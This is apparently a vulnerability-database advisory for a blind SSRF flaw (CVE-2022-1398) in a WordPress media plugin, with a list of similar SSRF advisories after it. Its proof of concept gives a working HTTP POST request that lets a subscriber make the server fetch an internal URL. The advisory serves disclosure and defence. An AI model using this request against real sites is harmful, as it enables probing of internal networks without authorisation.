External Media without Import <= 1.1.2 – Subscriber+ Blind SSRF | CVE 2022-1398 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation and does to ensure that medias added via URLs are external medias, which could allow any authenticated users, such as subscriber to perform blind SSRF attacks

Proof of Concept

Put an internal URL such as http://127.0.0.1:8080 in the "Add medias from URLs" feature of the plugin (/wp-admin/upload.php?page=add-external-media-without-import)

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

urls=http%3A%2F%2F127.0.0.1%3A8080%2Fyolo&width=&height=&mime-type=&action=add_external_media_without_import

Affects Plugins

external-media-without-import

No known fix

References

CVE

Classification

Type

SSRF

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Luan Pedersini

Submitter

IBLISS Digital Security

Submitter website

https://ibliss.com.br

Verified

Yes

WPVDB ID

5440d177-e995-403e-b2c9-42ceda14579e

Timeline

Publicly Published

2022-04-19 (about 3 years ago)

Added

2022-04-19 (about 3 years ago)

Last Updated

2022-04-20 (about 3 years ago)

Other

Published

Title

Published

2024-01-08

Title

Contact Form 7 Extension For Mailchimp < 0.9.19 - Subscriber+ Server-Side Request Forgery

Published

2024-05-22

Title

WPCafe < 2.2.24 - Unauthenticated Blind Server-Side Request Forgery

Published

2021-06-29

Title

RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF

Published

2025-09-05

Title

Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One <= 2.2.6 - Authenticated (Subscriber+) Server-Side Request Forgery

Published

2025-10-24

Title

Slider Templates <= 1.0.3 - Authenticated (Subscriber+) Server-Side Request Forgery